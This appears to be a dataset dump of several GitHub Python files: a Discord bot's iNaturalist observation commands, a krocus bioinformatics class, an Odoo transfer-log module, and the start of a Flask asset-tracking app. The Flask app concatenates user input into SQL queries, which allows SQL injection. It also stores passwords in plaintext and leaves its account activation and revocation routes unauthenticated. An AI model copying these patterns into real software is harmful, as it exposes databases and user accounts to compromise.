use a\r\n slash-command).\r\n \"\"\"\r\n if query:\r\n id_or_link = None\r\n if query.isnumeric():\r\n id_or_link = query\r\n else:\r\n mat = re.search(PAT_OBS_LINK, query)\r\n if mat and mat[\"url\"]:\r\n id_or_link = query\r\n if id_or_link:\r\n obs, url = await maybe_match_obs(\r\n self, ctx, id_or_link, id_permitted=True\r\n )\r\n # Note: if the user specified an invalid or deleted id, a url is still\r\n # produced (i.e. should 404).\r\n if url:\r\n yield ObsResult(obs, url, ctx.interaction is not None)\r\n return\r\n else:\r\n await apologize(ctx, \"I don't understand\")\r\n yield\r\n return\r\n\r\n try:\r\n ref = ctx.message.reference\r\n if ref:\r\n # It's a reply. Try to get an observation from the message.\r\n # TODO: Lifted from TaxonReplyConverter; don't know where this belongs yet.\r\n msg = ref.cached_message\r\n if not msg:\r\n if (\r\n ctx.guild\r\n and not ctx.channel.permissions_for(\r\n ctx.guild.me\r\n ).read_message_history\r\n ):\r\n raise LookupError(\r\n \"I need Read Message History permission to read that message.\"\r\n )\r\n msg = await ctx.channel.fetch_message(ref.message_id)\r\n if msg and msg.embeds:\r\n inat_embed = INatEmbed.from_discord_embed(msg.embeds[0])\r\n # pylint: disable=no-member, assigning-non-slot\r\n # - See https://github.com/PyCQA/pylint/issues/981\r\n # Replying to observation display:\r\n if inat_embed.obs_url:\r\n mat = re.search(PAT_OBS_LINK, inat_embed.obs_url)\r\n # Try to get single observation for the display:\r\n if mat and mat[\"url\"]:\r\n obs, url = await maybe_match_obs(\r\n self, ctx, inat_embed.obs_url, id_permitted=False\r\n )\r\n # If there is no query and we found a url, just yield\r\n # the obs result for the matched obs without a\r\n # preview (i.e. it has been seen already so don't\r\n # show it again - typically useful for showing updated\r\n # details like community ID).\r\n if url and not query:\r\n yield ObsResult(obs, url, False)\r\n return\r\n # Otherwise try to get other usable info from reply\r\n # to make a new observation query.\r\n _query = await TaxonReplyConverter.convert(ctx, query)\r\n obs = await self.obs_query.query_single_obs(ctx, _query)\r\n except EmptyArgument:\r\n await ctx.send_help()\r\n yield\r\n return\r\n except (BadArgument, LookupError) as err:\r\n await apologize(ctx, str(err))\r\n yield\r\n return\r\n\r\n url = f\"{WWW_BASE_URL}/observations/{obs.id}\"\r\n yield ObsResult(obs, url, True)\r\n\r\n @commands.hybrid_group(aliases=[\"observation\"], fallback=\"show\")\r\n @checks.bot_has_permissions(embed_links=True)\r\n @use_client\r\n async def obs(self, ctx, *, query: Optional[str] = \"\"):\r\n \"\"\"Observation matching query, link, or number.\r\n\r\n - See `[p]query` and `[p]taxon_query` for help with *query* terms.\r\n - Use `[p]search obs` to find more than one observation.\r\n - Normally just pasting a *link* will suffice in a channel where *autoobs* is on. See `[p]autoobs` for details.\r\n \"\"\" # noqa: E501\r\n async with self._single_obs(ctx, query) as res:\r\n if res:\r\n embed = await self.make_obs_embed(\r\n ctx, res.obs, res.url, preview=res.preview\r\n )\r\n await self.send_obs_embed(ctx, embed, res.obs)\r\n\r\n @obs.command(name=\"count\")\r\n async def obs_count(self, ctx, *, query: Optional[TaxonReplyConverter] = None):\r\n \"\"\"Count matching observations.\"\"\"\r\n await (self.bot.get_command(\"tabulate\")(ctx, query=query))\r\n\r\n @obs.command(name=\"life\")\r\n async def obs_life(self, ctx, *, query: Optional[TaxonReplyConverter] = None):\r\n \"\"\"Count matching observations.\"\"\"\r\n await (self.bot.get_command(\"life\")(ctx, query=query))\r\n\r\n @obs.command(name=\"map\")\r\n async def obs_map(self, ctx, *, query: NaturalQueryConverter):\r\n \"\"\"Show map of observations.\"\"\"\r\n await (self.bot.get_command(\"map obs\")(ctx, query=query))\r\n\r\n @obs.command(name=\"maverick\")\r\n async def obs_maverick(self, ctx, *, query: Optional[TaxonReplyConverter] = None):\r\n \"\"\"Count maverick observations.\"\"\"\r\n await (self.bot.get_command(\"tabulate maverick\")(ctx, query=query))\r\n\r\n @obs.command(name=\"search\")\r\n async def obs_search(self, ctx, *, query: Optional[TaxonReplyConverter] = None):\r\n \"\"\"Search for matching observations.\"\"\"\r\n await (self.bot.get_command(\"search obs\")(ctx, query=query))\r\n\r\n @obs.command(name=\"img\", aliases=[\"image\", \"photo\"])\r\n @checks.bot_has_permissions(embed_links=True)\r\n @use_client\r\n async def obs_img(self, ctx, number: Optional[int], *, query: Optional[str] = \"\"):\r\n \"\"\"Image for observation.\r\n\r\n - Shows the image indicated by `number`, or if number is omitted, the first image.\r\n - Command may be a *Reply* to an observation display instead of a query.\r\n - See `[p]query` and `[p]taxon_query` for help with *query* terms.\r\n \"\"\" # noqa: E501\r\n async with self._single_obs(ctx, query) as res:\r\n if res:\r\n embed = await self.make_obs_embed(\r\n ctx, res.obs, res.url, preview=number or 1\r\n )\r\n await self.send_obs_embed(ctx, embed, res.obs)\r\n\r\n @commands.hybrid_group(fallback=\"help\")\r\n @checks.bot_has_permissions(embed_links=True)\r\n async def top(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n \"\"\"Leaderboards for observations, species, identifications, etc.\"\"\"\r\n await ctx.send_help()\r\n\r\n @top.command(name=\"identifiers\", aliases=[\"id\", \"ids\"])\r\n @use_client\r\n async def top_identifiers(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n \"\"\"Top observations IDed per IDer (alias `[p]topids`).\"\"\"\r\n await self._tabulate_query(ctx, query, view=\"ids\")\r\n\r\n @top.command(name=\"observers\", aliases=[\"obs\"])\r\n @use_client\r\n async def top_observers(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n \"\"\"Top observations per observer (alias `[p]topobs`).\"\"\"\r\n await self._tabulate_query(ctx, query)\r\n\r\n @top.command(name=\"species\", aliases=[\"spp\", \"sp\"])\r\n @use_client\r\n async def top_species(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n \"\"\"Top species per observer (alias `[p]topspp`).\"\"\"\r\n await self._tabulate_query(ctx, query, view=\"spp\")\r\n\r\n @commands.group(invoke_without_command=True)\r\n @checks.bot_has_permissions(embed_links=True)\r\n @use_client\r\n async def life(self, ctx, *, query: Optional[Union[TaxonReplyConverter, str]]):\r\n \"\"\"Life list with observation totals.\r\n\r\n • If the life list is for one user, the title links to it.\r\n • Buttons to change `per` details and taxon root:\r\n • :leaves: toggles alphabetial list of leaf taxa.\r\n • :arrow_up_down: changes rank detail level: main (default), any, or selected taxon.\r\n • :top: toggles selected taxon as the tree root.\r\n • Buttons to change taxon row details:\r\n • :regional_indicator_d: toggles direct taxon count.\r\n • :regional_indicator_c: toggles common names (user life list only).\r\n • Specify `per any` for maximum detail or `per ` to show taxa of just this rank.\r\n • See `[p]query` and `[p]taxon_query` for help with *query* terms, or `[p]glossary` for an explanation of *leaf taxa*.\r\n\r\n e.g.\r\n ```\r\n [p]life my\r\n -> Your whole life list\r\n [p]life my beetles\r\n -> Your beetles\r\n [p]life my bees per any\r\n -> Your bees at any rank detail\r\n [p]life bees from nova scotia\r\n -> Bees from this place\r\n [p]life beetles by syntheticbee\r\n -> This user's beetles\r\n ```\r\n \"\"\" # noqa: E501\r\n error_msg = None\r\n msg = None\r\n async with ctx.typing():\r\n try:\r\n if isinstance(query, Query):\r\n _query = query\r\n else:\r\n _query = await TaxonReplyConverter.convert(\r\n ctx, query, allow_empty=True\r\n )\r\n query_response = await self.query.get(ctx, _query)\r\n per_rank = _query.per or \"main\"\r\n if per_rank not in [*RANK_KEYWORDS, \"leaf\", \"main\", \"any\"]:\r\n raise BadArgument(\r\n f\"Specify `per `. \"\r\n f\"See `{ctx.clean_prefix}help life` for details.\"\r\n )\r\n life_list = await ctx.inat_client.observations.life_list(\r\n **query_response.obs_args()\r\n )\r\n if not life_list:\r\n raise LookupError(\r\n f\"No life list {query_response.obs_query_description()}\"\r\n )\r\n per_page = 10\r\n life_list_formatter = LifeListFormatter(\r\n life_list,\r\n per_rank,\r\n query_response,\r\n with_taxa=True,\r\n per_page=per_page,\r\n )\r\n await BaseMenu(\r\n source=LifeListSource(life_list_formatter),\r\n delete_message_after=False,\r\n clear_reactions_after=True,\r\n timeout=60,\r\n cog=self,\r\n page_start=0,\r\n ).start(ctx=ctx)\r\n except (BadArgument, LookupError) as err:\r\n error_msg = str(err)\r\n if error_msg:\r\n await apologize(ctx, error_msg)\r\n else:\r\n if msg:\r\n await add_reactions_with_cancel(ctx, msg, [])\r\n\r\n @commands.group(invoke_without_command=True, aliases=[\"tab\"])\r\n @checks.bot_has_permissions(embed_links=True)\r\n @use_client\r\n async def tabulate(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n \"\"\"Tabulate iNaturalist data.\r\n\r\n • Only observations can be tabulated. More kinds of table to be supported in future releases.\r\n • The *per row* can be: `from`, `id by`, `not by`, or `by`, and breaks down the count of observations in the table topic into per name (of place or user) in the table.\r\n • When more than one eligible filter is given, the first in order in the list above, is the table topic, and the second in order above is the *per row* count.\r\n • All remaining filters beyond those, including any that can't be used as *per row* values, e.g. `in prj`, `rg`, etc. are applied to the table topic.\r\n e.g.\r\n ```\r\n [p]tab fish from home\r\n -> per place (home listed; others react to add)\r\n [p]tab fish by me\r\n -> per user (self listed; others react to add)\r\n [p]tab fish not by me\r\n -> per unobserved by (self listed; others react to add)\r\n [p]tab fish id by me\r\n -> per identified by (self listed; others react to add)\r\n [p]tab fish from canada by me\r\n -> per user (self listed; others react to add) but only fish from canada are tabulated\r\n ```\r\n \"\"\" # noqa: E501\r\n error_msg = None\r\n msg = None\r\n async with ctx.typing():\r\n _query = query or await TaxonReplyConverter.convert(ctx, \"\")\r\n try:\r\n query_response = await self.query.get(ctx, _query)\r\n msg = await ctx.send(\r\n embed=await self.make_obs_counts_embed(query_response)\r\n )\r\n except (BadArgument, LookupError) as err:\r\n error_msg = str(err)\r\n if error_msg:\r\n await apologize(ctx, error_msg)\r\n else:\r\n await self.add_obs_reaction_emojis(ctx, msg, query_response)\r\n\r\n @tabulate.command(name=\"maverick\")\r\n @use_client\r\n async def tabulate_maverick(self, ctx, *, query: Optional[str]):\r\n \"\"\"Maverick identifications.\r\n\r\n • By default, if your iNat login is known, your own maverick identifications are displayed.\r\n • The `by` qualifier can be used to display mavericks for another known user.\r\n \"\"\"\r\n error_msg = None\r\n async with ctx.typing():\r\n try:\r\n try:\r\n _query = await TaxonReplyConverter.convert(ctx, query)\r\n if not _query.user:\r\n _query.user = \"me\"\r\n except BadArgument:\r\n _query = await TaxonReplyConverter.convert(ctx, \"by me\")\r\n query_response = await self.query.get(ctx, _query)\r\n if not query_response.user:\r\n raise BadArgument(\"iNat user not found\")\r\n if _query and (\r\n _query.place\r\n or _query.controlled_term\r\n or _query.unobserved_by\r\n or _query.id_by\r\n or _query.per\r\n or _query.project\r\n ):\r\n raise BadArgument(\"I can't tabulate that yet\")\r\n embed = make_embed()\r\n embed.title = (\r\n f\"Maverick identifications {query_response.obs_query_description()}\"\r\n )\r\n ids_opt = {\"category\": \"maverick\", \"user_id\": query_response.user.id}\r\n if query_response.taxon:\r\n ids_opt[\"taxon_id\"] = query_response.taxon.id\r\n embed.url = f\"{WWW_BASE_URL}/identifications?\" + urllib.parse.urlencode(\r\n ids_opt\r\n )\r\n await ctx.send(embed=embed)\r\n except (BadArgument, LookupError) as err:\r\n error_msg = str(err)\r\n if error_msg:\r\n await apologize(ctx, error_msg)\r\n\r\n async def _tabulate_query(self, ctx, query, view=\"obs\"):\r\n def format_pages(user_links, users_count, entity_counted, view):\r\n pages = []\r\n pages_len = int((len(user_links) - 1) / 10) + 1\r\n for page, links in enumerate(grouper(user_links, 10), start=1):\r\n header = \"**{} top {}{}{}**\".format(\r\n \"First 500\" if users_count > 500 else users_count,\r\n entity_counted,\r\n \" by species\" if view == \"spp\" else \"\",\r\n f\" (page {page} of {pages_len})\" if pages_len > 1 else \"\",\r\n )\r\n page = \"\\n\".join([header, TAXON_COUNTS_HEADER, *filter(None, links)])\r\n pages.append(page)\r\n return pages\r\n\r\n embeds = []\r\n error_msg = None\r\n async with ctx.typing():\r\n _query = query or await TaxonReplyConverter.convert(ctx, \"\")\r\n try:\r\n query_response = await self.query.get(ctx, _query)\r\n obs_opt_view = \"identifiers\" if view == \"ids\" else \"observers\"\r\n obs_opt = query_response.obs_args()\r\n users = await self.api.get_observations(obs_opt_view, **obs_opt)\r\n # We count identifications when we tabulate identifiers, but link\r\n # to the observations tab on the web to show the observations\r\n # they identified, as there's no tidy way to link directly\r\n # to the identifications instead.\r\n if view == \"ids\":\r\n obs_opt_view = \"observations\"\r\n users_count = users.get(\"total_results\")\r\n if not users_count:\r\n raise LookupError(\r\n f\"No observations found {query_response.obs_query_description()}\"\r\n )\r\n obs_opt[\"view\"] = obs_opt_view\r\n url = obs_url_from_v1(obs_opt)\r\n taxon = query_response.taxon\r\n species_only = (\r\n taxon and RANK_LEVELS[taxon.rank] <= RANK_LEVELS[\"species\"]\r\n )\r\n user_links = get_formatted_user_counts(users, url, species_only, view)\r\n query_description = query_response.obs_query_description()\r\n if view == \"ids\":\r\n entity_counted = \"identifiers\"\r\n else:\r\n entity_counted = obs_opt_view\r\n full_title = f\"{entity_counted.capitalize()} {query_description}\"\r\n pages = format_pages(user_links, users_count, entity_counted, view)\r\n\r\n summary_counts = await self.summarize_obs_spp_counts(taxon, obs_opt)\r\n embeds = [\r\n make_embed(\r\n title=full_title,\r\n url=url,\r\n description=f\"{summary_counts}\\n{page}\",\r\n )\r\n for page in pages\r\n ]\r\n except (BadArgument, LookupError) as err:\r\n error_msg = str(err)\r\n\r\n if error_msg:\r\n await apologize(ctx, error_msg)\r\n elif len(embeds) > 1:\r\n await menu(ctx, embeds, DEFAULT_CONTROLS)\r\n else:\r\n await ctx.send(embed=embeds[0])\r\n\r\n @tabulate.command(name=\"topids\")\r\n @use_client\r\n async def tabulate_top_identifiers(\r\n self, ctx, *, query: Optional[TaxonReplyConverter]\r\n ):\r\n \"\"\"Top observations IDed per IDer (alias `[p]topids`).\"\"\"\r\n await self._tabulate_query(ctx, query, view=\"ids\")\r\n\r\n @commands.command(name=\"topids\", hidden=True)\r\n @use_client\r\n async def top_identifiers_alias(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n \"\"\"Top observations IDed per IDer (alias `[p]tab topids`).\"\"\"\r\n await self._tabulate_query(ctx, query, view=\"ids\")\r\n\r\n @tabulate.command(name=\"topobs\")\r\n @use_client\r\n async def tabulate_top_observers(\r\n self, ctx, *, query: Optional[TaxonReplyConverter]\r\n ):\r\n \"\"\"Top observations per observer (alias `[p]topobs`).\"\"\"\r\n await self._tabulate_query(ctx, query)\r\n\r\n @commands.command(name=\"topobs\", hidden=True)\r\n @use_client\r\n async def top_observers_alias(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n \"\"\"Top observations per observer (alias `[p]tab topobs`).\"\"\"\r\n await self._tabulate_query(ctx, query)\r\n\r\n @tabulate.command(name=\"topspp\", alias=[\"topsp\"])\r\n @use_client\r\n async def tabulate_top_species(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n \"\"\"Top species per observer (alias `[p]topspp`).\"\"\"\r\n await self._tabulate_query(ctx, query, view=\"spp\")\r\n\r\n @commands.command(name=\"topspp\", alias=[\"topsp\"], hidden=True)\r\n @use_client\r\n async def top_species_alias(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n \"\"\"Top species per observer (alias `[p]tab topspp`).\"\"\"\r\n await self._tabulate_query(ctx, query, view=\"spp\")\r\n\r\n @commands.hybrid_command()\r\n @checks.bot_has_permissions(embed_links=True)\r\n @use_client\r\n async def link(self, ctx, *, query):\r\n \"\"\"Information and image from iNaturalist link.\r\n\r\n For observation displays, the default observation image is shown, if it has one.\r\n\r\n It is recommended when sending a URL to use the slash-command to avoid the message being previewed twice.\r\n\r\n If you're not sending as a slash-command, enclose the link in angle brackets to suppress the automatic Discord preview of the image to avoid the image being shown twice.\r\n\r\n e.g.\r\n ```\r\n [p]link \r\n ```\r\n\r\n See also `[p]help obs` and `[p]autoobs`.\r\n - Both of those methods for showing link info do not include the image, relying instead on the Discord to preview the link.\r\n - If channel permissions don't allow users to preview links, but do allow the bot to, or if you prefer the information on top, you may find this command preferable.\r\n \"\"\" # noqa: E501\r\n mat = re.search(PAT_OBS_LINK, query)\r\n if mat:\r\n obs_id = int(mat[\"obs_id\"])\r\n url = mat[\"url\"]\r\n\r\n home = await get_home(ctx)\r\n results = (\r\n await self.api.get_observations(\r\n obs_id, include_new_projects=1, preferred_place_id=home\r\n )\r\n )[\"results\"]\r\n obs = Observation.from_json(results[0]) if results else None\r\n embed = await self.make_obs_embed(ctx, obs, url)\r\n await self.send_obs_embed(ctx, embed, obs)\r\n return\r\n\r\n mat = re.search(PAT_TAXON_LINK, query)\r\n if mat:\r\n await (self.bot.get_command(\"taxon\")(ctx, query=mat[\"taxon_id\"]))\r\n return\r\n\r\n await apologize(ctx)\r\n","repo_name":"dronefly-garden/dronefly","sub_path":"inatcog/commands/obs.py","file_name":"obs.py","file_ext":"py","file_size_in_byte":23601,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"70819221924","text":"import logging\nimport os\nimport sys\nimport time\nfrom krocus.Fastas import Fastas\nfrom krocus.Fastq import Fastq\nfrom krocus.MlstProfile import MlstProfile\n\nclass Krocus:\n\tdef __init__(self,options):\n\t\tself.logger = logging.getLogger(__name__)\n\t\tself.allele_directory = options.allele_directory \n\t\tself.input_fastq = options.input_fastq\n\t\tself.kmer = options.kmer\n\t\tself.verbose = options.verbose\n\t\tself.min_fasta_hits = options.min_fasta_hits\n\t\tself.print_interval = options.print_interval\n\t\tself.output_file = options.output_file\n\t\tself.filtered_reads_file = options.filtered_reads_file\n\t\tself.target_st = options.target_st\n\t\tself.max_gap = options.max_gap\n\t\tself.min_block_size = options.min_block_size\n\t\tself.margin = options.margin\n\t\tself.start_time = int(time.time())\n\t\tself.divisible_by_3 = options.divisible_by_3\n\t\tself.min_kmers_for_onex_pass = options.min_kmers_for_onex_pass\n\t\tself.max_kmers = options.max_kmers\n\t\t\n\t\tif self.output_file and os.path.exists(self.output_file):\n\t\t\tself.logger.error(\"The output file already exists, please choose another filename: \"+ self.output_file)\n\t\t\tsys.exit(1)\n\t\t\t\n\t\tif self.filtered_reads_file and os.path.exists(self.filtered_reads_file):\n\t\t\tself.logger.error(\"The output filtered reads file already exists, please choose another filename: \"+ self.filtered_reads_file)\n\t\t\tsys.exit(1)\n\t\t\n\t\tif self.verbose:\n\t\t\tself.logger.setLevel(logging.DEBUG)\n\t\telse:\n\t\t\tself.logger.setLevel(logging.ERROR)\n\t\t\t\n\tdef run(self):\n\t\tmlst_profile = MlstProfile(self.mlst_profile_file())\n\t\tfastas = Fastas(self.logger, self.allele_directory, self.kmer,self.divisible_by_3, max_kmers = self.max_kmers)\n\t\tfastq = Fastq(self.logger, self.input_fastq, self.kmer, fastas.get_fastas_to_kmers(), self.min_fasta_hits , mlst_profile, self.print_interval, self.output_file, self.filtered_reads_file, target_st = self.target_st, max_gap = self.max_gap, min_block_size = self.min_block_size, margin = self.margin, start_time = self.start_time, min_kmers_for_onex_pass = self.min_kmers_for_onex_pass, max_kmers = self.max_kmers)\n\t\tfastq.read_filter_and_map()\n\n\tdef mlst_profile_file(self):\n\t\tprofile_txt = os.path.join(self.allele_directory, 'profile.txt')\n\t\tif not os.path.exists(profile_txt):\n\t\t\tself.logger.error(\"The MLST profile file cannot be accessed: \"+ profile_txt)\n\t\treturn profile_txt\n\t\t","repo_name":"andrewjpage/krocus","sub_path":"krocus/Krocus.py","file_name":"Krocus.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"52"} +{"seq_id":"31164582029","text":"from odoo import fields, models, api\nfrom datetime import datetime\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT as DTF\n\n\nclass StockPicking(models.Model):\n _inherit = 'stock.picking'\n\n\n transfer_log_activity_ids = fields.One2many('transfer.log.activity','reference',string='Transfer Log Activity Ids')\n process_time = fields.Char(compute=\"_compute_process_time\", string='Processed Time', store=True, help=\"The time it takes to complete a transfer.\")\n picking_name = fields.Char(related=\"picking_type_id.name\")\n\n def create_transfer_activity_log(self):\n if self.state != 'draft':\n process_time =self._get_process_time()\n else:\n process_time = '00:00:00'\n time = str(process_time).split(':')\n total_seconds = 0\n if len(time) == 3:\n total_seconds += (float(time[0]) * 60 * 60) + (float(time[1]) * 60) + (float(time[2]))\n hours = total_seconds // 3600\n days = int(total_seconds // (24 * 3600))\n minutes = (total_seconds % 3600) // 60\n total_seconds = total_seconds % 60\n hours1 = hours + (days * 24)\n minutes1 = (hours1 * 60) + minutes\n seconds1 = (minutes1 * 60) + total_seconds\n vals = {\n 'origin': self.origin or '',\n 'timestamp': fields.datetime.now(),\n 'user': self.env.user.name,\n 'status': dict(self._fields['state'].selection).get(self.state),\n 'location': self and self.location_id.display_name,\n 'location_dest': self and self.location_dest_id.display_name,\n 'customer': self and self.partner_id and self.partner_id.name or ' ',\n 'vendor': self and self.partner_id and self.partner_id.name or ' ',\n 'days': round(seconds1 / 86400.00, 2),\n 'hours_minutes': process_time,\n 'process_time': process_time,\n 'company_id': self.company_id.id,\n 'picking_name': self.picking_name,\n 'reference': self.id or False\n }\n transfer_activity_log_id = self.env['transfer.activity.log'].create(vals)\n\n @api.multi\n @api.depends('transfer_log_activity_ids')\n def _compute_process_time(self):\n for res in self:\n total_seconds = 0\n for log_line in res.transfer_log_activity_ids:\n time = str(log_line.process_time).split(':')\n if len(time) == 3:\n total_seconds += (float(time[0]) * 60 * 60) + (float(time[1]) * 60) + (float(time[2]))\n Days = int(total_seconds // (24 * 3600))\n Hours = int(total_seconds // 3600)\n total_seconds %= 3600\n Minutes = int(total_seconds // 60)\n res.process_time = str(Days) + ' Days ' + str(Hours) + ' Hours ' + str(Minutes) + ' Minutes'\n\n\n @api.multi\n def _get_process_time(self):\n time = fields.datetime.now() - datetime.strptime(self.transfer_log_activity_ids[-1].timestamp, DTF)\n days, seconds = time.days, time.seconds\n hours = days * 24 + seconds // 3600\n minutes = (seconds % 3600) // 60\n seconds = seconds % 60\n second = str('0' + str(seconds)) if seconds < 9 else str(seconds)\n minute = str('0' + str(minutes)) if minutes < 9 else str(minutes)\n hour = str('0' + str(hours)) if hours < 9 else str(hours)\n return hour + ':' + minute + ':' + second\n\n\n @api.multi\n def action_confirm(self):\n res = super(StockPicking, self).action_confirm()\n self.transfer_log_action_confirm()\n return res\n\n def transfer_log_action_confirm(self):\n line_vals = []\n for rec in self:\n rec.create_transfer_activity_log()\n line_vals.append((0, 0, {'status': dict(self._fields['state'].selection).get(self.state),\n 'timestamp': fields.datetime.now(),\n 'process_time': self._get_process_time(),\n 'user':self.env.user.id,}))\n rec.transfer_log_activity_ids = line_vals\n\n\n @api.multi\n def action_prepared(self):\n res = super(StockPicking, self).action_prepared()\n self.transfer_log_action_prepared()\n return res\n\n def transfer_log_action_prepared(self):\n line_vals = []\n for rec in self:\n rec.create_transfer_activity_log()\n line_vals.append((0, 0, {'status': dict(self._fields['state'].selection).get(self.state),\n 'timestamp': fields.datetime.now(),\n 'process_time': self._get_process_time(),\n 'user': self.env.user.id, }))\n rec.transfer_log_activity_ids = line_vals\n\n\n @api.multi\n def do_transfer(self):\n res = super(StockPicking, self).do_transfer()\n self.transfer_log_action_do_new_transfer()\n return res\n\n def transfer_log_action_do_new_transfer(self):\n line_vals = []\n for rec in self:\n rec.create_transfer_activity_log()\n line_vals.append((0, 0, {'status': dict(self._fields['state'].selection).get(self.state),\n 'timestamp': fields.datetime.now(),\n 'process_time': self._get_process_time(),\n 'user': self.env.user.id, }))\n rec.transfer_log_activity_ids = line_vals\n\n @api.multi\n def action_done(self):\n res = super(StockPicking, self).action_done()\n self.transfer_log_action_done()\n self.move_lines.write({'process_time': self.process_time})\n self.pack_operation_product_ids.write({'process_time': self.process_time})\n return res\n\n def transfer_log_action_done(self):\n line_vals = []\n for rec in self:\n rec.create_transfer_activity_log()\n line_vals.append((0, 0, {'status': dict(self._fields['state'].selection).get(self.state),\n 'timestamp': fields.datetime.now(),\n 'process_time': self._get_process_time(),\n 'user': self.env.user.id, }))\n rec.transfer_log_activity_ids = line_vals\n\n @api.model\n def create(self, vals):\n res = super(StockPicking, self).create(vals)\n res.create_transfer_activity_log()\n line_vals = [(0, 0, {'status': 'Draft',\n 'timestamp': fields.datetime.now(),\n 'process_time': '00:00:00',\n 'user': self.env.user.id})]\n res.transfer_log_activity_ids = line_vals\n return res\n\nclass StockMove(models.Model):\n _inherit = 'stock.move'\n\n process_time = fields.Char(string='Processed Time', help=\"The time it takes to complete a transfer.\")\n\n\nclass StockPackOperation(models.Model):\n _inherit = 'stock.pack.operation'\n\n process_time = fields.Char(string='Processed Time', help=\"The time it takes to complete a transfer.\")","repo_name":"Muhammad-SF/Test","sub_path":"core/transfer_activity_log/model/stock_picking.py","file_name":"stock_picking.py","file_ext":"py","file_size_in_byte":6998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22304071816","text":"from flask import Flask, session, escape, render_template, request, redirect\nfrom config import dbname, dbhost, dbport, secret_key\nimport psycopg2\nfrom datetime import datetime\n\napp = Flask(__name__, template_folder='templates')\nconn = psycopg2.connect(dbname=dbname, host=dbhost)\ncur = conn.cursor()\n\n# Set secret key\napp.secret_key = secret_key\n\n# Login page: logs in user or redirects them to the create_user page if no user found\n@app.route('/', methods=['GET','POST'])\n@app.route('/login', methods=['GET','POST'])\ndef login():\n if (request.method == 'POST'):\n loginUN = request.form.get('username')\n pw = request.form.get('password')\n\n # If user provided username and password\n if ((loginUN != \"\") & (pw != \"\")):\n cur.execute(\"SELECT * FROM users WHERE users.username = \\'\" + loginUN + \"\\';\")\n user = cur.fetchone()\n\n # If username exists, check password\n if (user != None):\n if (user[4] == False):\n return render_template('error.html', error=\"User exists but is not active! Use the CLI client to set active status for \" + loginUN)\n\n # Password matches form data\n elif (user[2] == pw):\n session['username'] = loginUN\n \n # Save role in session\n cur.execute(\"SELECT roles.rolename FROM roles WHERE roles.roles_pk = \\'\" + str(user[3]) + \"\\';\")\n rolename = cur.fetchone()\n session['role'] = rolename[0]\n\n return redirect('/dashboard')\n else:\n return render_template('login.html', error=\"Incorrect password!\")\n else:\n return render_template('/login.html', error=\"User doesn't exist. Use CLI client activate_user to add a user!\")\n else:\n return render_template('login.html', error=\"Cannot log in with blank username or password. If you want to create a new user, type in any input and press login, and you will be taken to the page. Alternatively, visit localhost:8080/create_user\")\n\n return render_template('login.html', error=\" \")\n\n# Error catching route for old create_user route\n@app.route('/create_user', methods = ['GET','POST'])\ndef create_user():\n return render_template('/login.html', error=\"This route was removed as of Assignment 10. Please use the CLI client activate_user to add or activate a user in the future. Thank you for your patience and understanding\")\n\n# Route for creating new users. If user already exists, loads error into html\n@app.route('/activate_user', methods=['GET','POST'])\ndef activate_user():\n if (request.method == 'POST'):\n loginUN = request.form['username']\n pw = request.form['password']\n role = request.form['role']\n\n # If user provided username and password\n if ((loginUN != \"\") & (pw != \"\")):\n cur.execute(\"SELECT * FROM users WHERE users.username = \\'\" + loginUN + \"\\';\")\n user = cur.fetchone()\n\n # If user exists, update password and active status\n if (user != None):\n cur.execute(\"UPDATE users SET password = %s, isActive = True WHERE user_pk = %s\", (pw, user[0]))\n conn.commit()\n return (\"Updated user \" + user[1] + \" to active status\")\n \n # If role exists, try to find it in DB\n elif (role != None):\n cur.execute(\"SELECT * FROM roles WHERE roles.rolename = \\'\" + role + \"\\'\")\n userRole = cur.fetchone()\n \n # If not found, create it before inserting new user\n if (userRole == None):\n cur.execute(\"INSERT INTO roles (rolename) VALUES (\\'\" + role + \"\\')\")\n cur.execute(\"SELECT * FROM roles WHERE roles.rolename = \\'\" + role + \"\\'\")\n userRole = cur.fetchone()\n \n # Insert new user\n cur.execute(\"INSERT INTO users (username, password, role_fk, isActive) VALUES (%s, %s, %s, True)\", (loginUN, pw, str(userRole[0])))\n # If creating user with no role, return error\n else:\n return (\"Error: User must have a role\")\n\n # Commit changes, login user\n conn.commit()\n return (\"Successfully created user \" + loginUN)\n else:\n return (\"Error: Cannot have blank username or password!\")\n \n return render_template('error.html', error=\"This route is only used by a CLI client now. Thank you for your understanding and patience\")\n\n# Route to revoke user access\n@app.route('/revoke_user', methods=['GET','POST'])\ndef revoke_user():\n if (request.method == 'POST'):\n loginUN = request.form['username']\n\n cur.execute(\"SELECT * FROM users WHERE username = '\" + loginUN + \"';\")\n user = cur.fetchone()\n\n if (user != None):\n cur.execute(\"UPDATE users SET isActive = False WHERE user_pk = '\" + str(user[0]) + \"';\")\n conn.commit()\n return (\"Successfully revoked active status of user \" + loginUN)\n else:\n return (\"Error: User \" + loginUN + \" does not exist. Try using the activate_user CLI to add this user\")\n \n else:\n return render_template('error.html', error=\"This route is only used by a CLI client now. Thank you for your understand and patience\")\n\n\n# Route that presents incrediably simple dashboard with the user's username, and logout button\n@app.route('/dashboard/', methods=['GET'])\n@app.route('/dashboard', methods=['GET'])\ndef dashboard(message=''):\n # Render different aspects of template based on user role\n if (session['role'] == \"Logistics Officer\"):\n # Select all asset tags from transfers that are in transit\n cur.execute(\"SELECT assets.tag, transfers.transfer_pk FROM assets, transfers WHERE (assets.assets_pk = transfers.asset_fk) AND (transfers.unload_dt IS NULL) AND (transfers.load_dt IS NOT NULL) AND (transfers.approver_fk IS NOT NULL)\")\n transfers = cur.fetchall()\n\n # Select all asset tags from transfers that are not in transit yet\n cur.execute(\"SELECT assets.tag, transfers.transfer_pk FROM assets, transfers WHERE (assets.assets_pk = transfers.asset_fk) AND (transfers.load_dt IS NULL) AND (transfers.approver_fk IS NOT 